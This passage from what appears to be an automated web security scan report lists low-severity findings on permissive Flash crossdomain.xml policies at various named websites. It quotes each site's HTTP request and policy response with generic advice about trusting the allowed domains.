Host: www.consumerreports.org

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise
Date: Sat, 02 Apr 2011 13:38:39 GMT
Content-type: application/rss+xml
Last-modified: Sat, 02 Apr 2011 12:37:52 GMT
Content-length: 661
Accept-ranges: bytes
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.consumerreports.org" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.consumer.org" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="false"/>
...[SNIP]...
7.222. http://www.consumersearch.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.consumersearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.consumersearch.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Unix) PHP/5.2.6 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.6
X-Drupal-Cache: MISS
Last-Modified: Sat, 02 Apr 2011 13:33:51 +0000
ETag: "1301751231"-gzip
nnCoection: close
Content-Type: text/xml
Expires: Sat, 02 Apr 2011 13:33:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:33:51 GMT
Content-Length: 597
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.consumersearch.com" />

...[SNIP]...
<allow-access-from domain="*.www.consumersearch.com" />
<allow-access-from domain="cs6.peter" />
<allow-access-from domain="*.cs6.peter" />
<allow-access-from domain="www2.comsumersearch.com" />
<allow-access-from domain="*.www2.comsumersearch.com" />
<allow-access-from domain="d62.consumersearch.com" />
<allow-access-from domain="*.d62.consumersearch.com" />
...[SNIP]...
7.223. http://www.costco.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.costco.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.costco.com

Response

HTTP/1.1 200 OK
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:39:31 GMT
Content-Type: text/xml
Accept-Ranges: bytes
Last-Modified: Mon, 28 Mar 2011 22:23:08 GMT
ETag: "02eecb696edcb1:2d96"
Content-Length: 161

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.costco.com" />
<allow-access-from domain="*.costco.ca" />
</cross-domain-policy>
7.224. http://www.dailyfinance.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dailyfinance.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dailyfinance.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:48 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 221
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/>
   <allow-access-from domain="*.aolcdn.com" />
   <allow-access-from domain="*.test.aol.com" />
<
...[SNIP]...
7.225. http://www.dailykos.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dailykos.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dailykos.com

Response

HTTP/1.0 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: application/xml
Date: Sat, 02 Apr 2011 14:09:30 GMT
Accept-Ranges: bytes
ETag: "c2e9f-4f3-49c267bd3a1c0"
Connection: close
Last-Modified: Sun, 13 Feb 2011 09:23:27 GMT
Content-Length: 1267

<?xml version="1.0"?>
<!--
Macromedia enforces some security policies in Flash that keep movies on one
domain from loading data files on another domain. If a Flash movie is trying to
load data from
...[SNIP]...
<allow-access-from domain="dailykos.com" />
<allow-access-from domain="*.dailykos.com" />
...[SNIP]...
7.226. http://www.dailymotion.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dailymotion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dailymotion.com

Response

HTTP/1.0 200 OK
Server: DMS/1.0.42
Vary: Accept-Encoding
Cache-Control: max-age=86400
Content-Type: text/xml; charset=utf-8
P3p: policyref="http://www.dailymotion.com/w3c/p3p.xml", CP="IDC DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sat, 02 Apr 2011 05:19:44 GMT
X-DM-Cache: DO
Accept-Ranges: bytes
X-Dm-Page: us.html.crossdomain
Connection: close
X-Cache-Info: cached
Content-Length: 4368

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.dailymotion.com"/><allow-access-from domain="*.dmcdn.net"/><allow-access-from domain="*.virgilio.it"/><allow-access-from domain="*.dailymotion.pl"/><allow-access-from domain="*.lunchbox-lustucruselection.fr"/><allow-access-from domain="*.tangozebra.com" /><allow-access-from domain="motifcdn2.doubleclick.net" /><allow-access-from domain="ad.au.doubleclick.net" /><allow-access-from domain="betadfa.doubleclick.net" /><allow-access-from domain="betadfa.doubleclick.com" /><allow-access-from domain="ad.cn.doubleclick.net" /><allow-access-from domain="ad.de.doubleclick.net" /><allow-access-from domain="ad.doubleclick.net" /><allow-access-from domain="ad.es.doubleclick.net" /><allow-access-from domain="ad.fr.doubleclick.net" /><allow-access-from domain="ad.hk.doubleclick.net" /><allow-access-from domain="ad.ie.doubleclick.net" /><allow-access-from domain="ad.it.doubleclick.net" /><allow-access-from domain="ad.jp.doubleclick.net" /><allow-access-from domain="ad.nl.doubleclick.net" /><allow-access-from domain="ad.se.doubleclick.net" /><allow-access-from domain="ad.tw.doubleclick.net" /><allow-access-from domain="ad.uk.doubleclick.net" /><allow-access-from domain="creatives.doubleclick.net" /><allow-access-from domain="dfa.doubleclick.com" /><allow-access-from domain="dfa.doubleclick.net" /><allow-access-from domain="dfp.doubleclick.com" /><allow-access-from domain="dfp.doubleclick.net" /><allow-access-from domain="doubleclick.net" /><allow-access-from domain="m.2mdn.net" /><allow-access-from domain="m.au.2mdn.net" /><allow-access-from domain="m.cn.2mdn.net" /><allow-access-from domain="m.de.2mdn.net" /><allow-access-from domain="m.doubleclick.net" /><allow-access-from domain="m.fr.2mdn.net" /><allow-access-from domain="m.hk.2mdn.net" /><allow-access-from domain="m.jp.2mdn.net" /><allow-access-from domain="m.se.2mdn.net" /><allow-access-from domain="m.tw.2mdn.net" /><allow-access-from domain="m.uk.2mdn.net" /><allow-access-from domain="m1.2mdn.net" /><allow-access-from domain="m1.doubleclick.net" /><allow-access-from domain="m1.jp.2mdn.net" /><allow-access-from domain="m2.2mdn.net" /><allow-access-from domain="m2.doubleclick.net" /><allow-access-from domain="m3.2mdn.net" /><allow-access-from domain="m3.doubleclick.net" /><allow-access-from domain="motifcdn.doubleclick.net" /><allow-access-from domain="motifcdn2.doubleclick.net" /><allow-access-from domain="sandbox.dartmotif.com" /><allow-access-from domain="demo.doubleclick.com" /><allow-access-from domain="demo.doubleclick.net" /><allow-access-from domain="m.au.2mdn.net" /><allow-access-from domain="m.cn.2mdn.net" /><allow-access-from domain="m.de.2mdn.net" /><allow-access-from domain="m.doubleclick.net" /><allow-access-from domain="m.fr.2mdn.net" /><allow-access-from domain="m.hk.2mdn.net" /><allow-access-from domain="m.jp.2mdn.net" /><allow-access-from domain="m.se.2mdn.net" /><allow-access-from domain="m.tw.2mdn.net" /><allow-access-from domain="m.uk.2mdn.net" /><allow-access-from domain="m1.2mdn.net" /><allow-access-from domain="marine.tribalddbparis.com" /><allow-access-from domain="*.etremarin.fr" /><allow-access-from domain="*.etremarin.com" /><allow-access-from domain="*.thebinge-lefilm.fr" /><allow-access-from domain="*.thebinge.fr" /><allow-access-from domain="*.binge-lefilm.com" /><allow-access-from domain="*.binge-lefilm.fr" /><allow-access-from domain="*.bingedrinking.fr" /><allow-access-from domain="*.binge-drinking.fr" /><allow-access-from domain="*.thebinge-lefilm.com" /><allow-access-from domain="*.dev.jfg-networks.net" /><allow-access-from domain="*.over-blog.com" /><allow-access-from domain="fdata.over-blog.net" /><allow-access-from domain="*.dail.eu.iogw.org" /><allow-access-from domain="*.dail.eu.iogw.net" /><allow-access-from domain="*.dail.eu.iogw.com" /><allow-access-from domain="*.auditude.com"/><allow-access-from domain="*.dmcloud.net" /><allow-access-from domain="*.smartnsimple.tv" /><allow-access-from domain="*.gamecreds.com" /><allow-access-from domain="*.innovid.com" /><allow-access-from domain="*.serving-sys.com" /><allow-access-from domain="*.serving-sys-dev2.com" />
...[SNIP]...
7.227. http://www.dallascowboys.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dallascowboys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dallascowboys.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.54 (Debian GNU/Linux) JRun/4.0 PHP/4.3.10-22 mod_ssl/2.0.54 OpenSSL/0.9.7e
ETag: "17900ac-75-cd42df00"
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Age: 768
Date: Sat, 02 Apr 2011 14:00:16 GMT
Last-Modified: Wed, 23 Jun 2010 04:16:28 GMT
Expires: Sat, 02 Apr 2011 14:00:46 GMT
Content-Length: 117
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.2cimple.com"/>
</cross-domain-policy>
7.228. http://www.dallasnews.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dallasnews.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dallasnews.com

Response

HTTP/1.1 200 OK
Set-Cookie: ececluster=R1231783856; path=/; expires=Sun, 03-Apr-2011 13:38:53 GMT
Last-Modified: Thu, 09 Dec 2010 15:43:18 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
x-svrl-ap: test-
Content-Type: text/xml
Vary: Accept-Encoding
cache-control: max-age = 120
Content-Length: 461
Date: Sat, 02 Apr 2011 13:36:51 GMT
X-Varnish: 1463194522 1463153058
Age: 411
Via: 1.1 varnish
Connection: close
X-Cache: HIT:2
x-svrl: V4

<?xml version="1.0" encoding="UTF-8"?>

<!--
Document : crossdomain.xml
Created on : November 26, 2010, 11:26 AM
Author : svorin
Description:
Allow the following domain a
...[SNIP]...
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.wunderground.com" />
...[SNIP]...
7.229. http://www.datpiff.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.datpiff.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.datpiff.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:21 GMT
Server: Apache
Last-Modified: Mon, 29 Nov 2010 00:45:49 GMT
ETag: "5c900fb-ef-4962664afa940"
Accept-Ranges: bytes
Content-Length: 239
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.datpiff.com" />
...[SNIP]...
7.230. http://www.dell.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dell.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dell.com

Response

HTTP/1.1 200 OK
Content-Length: 370
Content-Type: text/xml
Last-Modified: Fri, 27 Jun 2008 14:53:19 GMT
Accept-Ranges: bytes
ETag: "fde0f98965d8c81:0"
Server: Microsoft-IIS/7.0
Set-Cookie: stop_mobi=; path=/
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI "
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:26:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.dell.com -->
<cross-domain-policy>
<allow-access-from domain="*.dell.com" />
<allow-access-from domain="*.coltas.com" />
<allow-access-from domain="*.dellpartnerdirect.com" />
...[SNIP]...
7.231. http://www.demdex.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.demdex.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.demdex.net

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:36 GMT
Server: Apache/2.2.10 (Unix)
Last-Modified: Thu, 09 Dec 2010 16:36:41 GMT
ETag: "6869d-d0-496fcd7a9d840"
Accept-Ranges: bytes
Content-Length: 208
P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
Keep-Alive: timeout=5, max=99
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.adap.tv"/>
</cross-domain-
...[SNIP]...
7.232. http://www.dickssportinggoods.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dickssportinggoods.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dickssportinggoods.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:01 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 08 May 2008 01:32:26 GMT
ETag: "4bc054-309-44cae0dc6de80"
Accept-Ranges: bytes
Content-Length: 777
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 13:34:01 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<allow-access-from domain="www.dickssportinggoods.com"/>
<allow-access-from domain="dsp.imageg.net"/>
<allow-access-from domain="dsp.merch2.gspt.net"/>
<allow-access-from domain="dsp.merch.gspt.net"/>
<allow-access-from domain="preview.gsipartners.com"/>
<allow-access-from domain="preview1.gsipartners.com"/>
<allow-access-from domain="preview.remotetools.gsipartners.com"/>
<allow-access-from domain="preview1.remotetools.gsipartners.com"/>
<allow-access-from domain="*.gspt.net"/>
<allow-access-from domain="*.gsipartners.com"/>
<allow-access-from domain="172.20.1.236" />
<allow-access-from domain="172.21.1.236" />
<allow-access-from domain="206.16.220.236" />
<allow-access-from domain="63.240.110.236" />
...[SNIP]...
7.233. http://www.directv.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.directv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.directv.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Length: 138
Content-Type: text/xml
Last-Modified: Wed, 08 Dec 2010 23:00:17 GMT
Accept-Ranges: bytes
ETag: "801612ae2b97cb1:80b"
Server: Microsoft-IIS/6.0
Set-Cookie: TLTHID=FFF623684C9DCFC58CA7CFB0C5FAA01D; Path=/; Domain=.directv.com
Set-Cookie: TLTSID=FFF623684C9DCFC58CA7CFB0C5FAA01D; Path=/; Domain=.directv.com
Date: Sat, 02 Apr 2011 13:26:10 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*.directv.com"/>
<allow-access-from domain="*.brightcove.com"/>
</cross-domain-policy>
7.234. http://www.discovery.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.discovery.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.discovery.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.15 (Unix)
Last-Modified: Mon, 13 Dec 2010 19:02:38 GMT
ETag: "238b88-1763-4974f58fc8f80"
Accept-Ranges: bytes
Content-Length: 5987
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:25:18 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<!-- GLOBAL DISCOVERY -->
<allow-access-from domain="*.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.stage.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.stg.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.uat.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.test.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.dpr.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.dev.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.oascentral.discovery.com" />
...[SNIP]...
<allow-access-from domain="dctladreg01.itg.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.discoverymedia.com" />
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
...[SNIP]...
<allow-access-from domain="*.247realmedia.com" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.*" />
...[SNIP]...
<allow-access-from domain="*.akamai.net" />
...[SNIP]...
<allow-access-from domain="*.pets911.com" />
<allow-access-from domain="pets911.buffalo.com" />
...[SNIP]...
<allow-access-from domain="discovery.blogs.com" />
...[SNIP]...
<allow-access-from domain="*.brightcove.vo.llnwd.net" />
...[SNIP]...
<allow-access-from domain="*.vo.llnwd.net" />
...[SNIP]...
<allow-access-from domain="*.brightcove.*" />
...[SNIP]...
<allow-access-from domain="*.channelfinder.net" />
...[SNIP]...
<allow-access-from domain="*.foodfit.com" />
<allow-access-from domain="*.healthgrades.com" />
<allow-access-from domain="*.centerwatch.com" />
<allow-access-from domain="*.sittercity.com" />
<allow-access-from domain="*.chumby.com" />
...[SNIP]...
<allow-access-from domain="*.howstuffworks.com" />
...[SNIP]...
<allow-access-from domain="*.petfinder.com" />
...[SNIP]...
<allow-access-from domain="*.treehugger.com" />
...[SNIP]...
<allow-access-from domain="*.crewintegrated.com" />
...[SNIP]...
<allow-access-from domain="video.search.yahoo.com" />
...[SNIP]...
<allow-access-from domain="*.tv.com" />
...[SNIP]...
<allow-access-from domain="test.bayrock.net" />
...[SNIP]...
<allow-access-from domain="test.philadelphiaspeed.net" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" />
...[SNIP]...
<allow-access-from domain="*.sympleton.com" />
...[SNIP]...
<allow-access-from domain="*.att.com" />
...[SNIP]...
<allow-access-from domain="*.clearspring.com" />
...[SNIP]...
7.235. http://www.diynetwork.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.diynetwork.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.diynetwork.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Mon, 09 Nov 2009 19:15:05 GMT
Accept-Ranges: bytes
Content-Length: 967
Content-Type: application/xml
Date: Sat, 02 Apr 2011 14:03:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.hgtvpro.com"/>
<allow-access-from domain="*.hgtv.com"/>
<allow-access-from domain="*.diynetwork.com"/>
<allow-access-from domain="*.diynet.com"/>
<allow-access-from domain="*.fineliving.com"/>
<allow-access-from domain="*.food.com"/>
<allow-access-from domain="*.foodnetwork.com"/>
<allow-access-from domain="*.gactv.com"/>
<allow-access-from domain="*.scrippsonline.com"/>
<allow-access-from domain="*.hottrends2005.com"/>
<allow-access-from domain="*.hottrends2006.com"/>
<allow-access-from domain="*.scrippsnetworks.com"/>
<allow-access-from domain="72.3.226.28" />
<allow-access-from domain="*.widgets.isg-marketing.com" />
<allow-access-from domain="*.videomment.com" />
<allow-access-from domain="*.videomerce.com"/>
...[SNIP]...
7.236. http://www.dslreports.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dslreports.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dslreports.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 14:03:16 GMT
Content-Type: text/xml
Content-Length: 393
Last-Modified: Wed, 07 May 2008 23:58:53 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="www.targetscope.com" />
<allow-access-from domain="www.broadbandreports.com" />
<allow-access-from domain="www.dslreports.com" />
<allow-access-from domain="dev.dslreports.com" />
<allow-access-from domain="www.aggiejy.com" />
<allow-access-from domain="216.254.95.41" />
<allow-access-from domain="*.catt.com" />
...[SNIP]...
7.237. http://www.dt00.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dt00.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dt00.net

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 14:00:05 GMT
Content-Type: text/xml
Content-Length: 526
Last-Modified: Tue, 21 Jul 2009 13:01:21 GMT
Connection: close
Expires: Mon, 02 May 2011 14:00:05 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="intv.ru" to-ports="80"/>
<allow-http-request-headers-from domain="intv.ru" headers="*" />
<allow-access-from domain="*.intv.ru" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="www.liveresult.ru" to-ports="80"/>
...[SNIP]...
7.238. http://www.ebay.ca/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ebay.ca
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ebay.ca

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 27 Oct 2010 13:21:58 GMT
Content-Type: application/xml
Expires: Sat, 02 Apr 2011 14:10:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 14:10:04 GMT
Content-Length: 3890
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.ebay.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.au" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.at" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.be" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ca" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.cn" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.de" secure="false"/>
...[SNIP]...
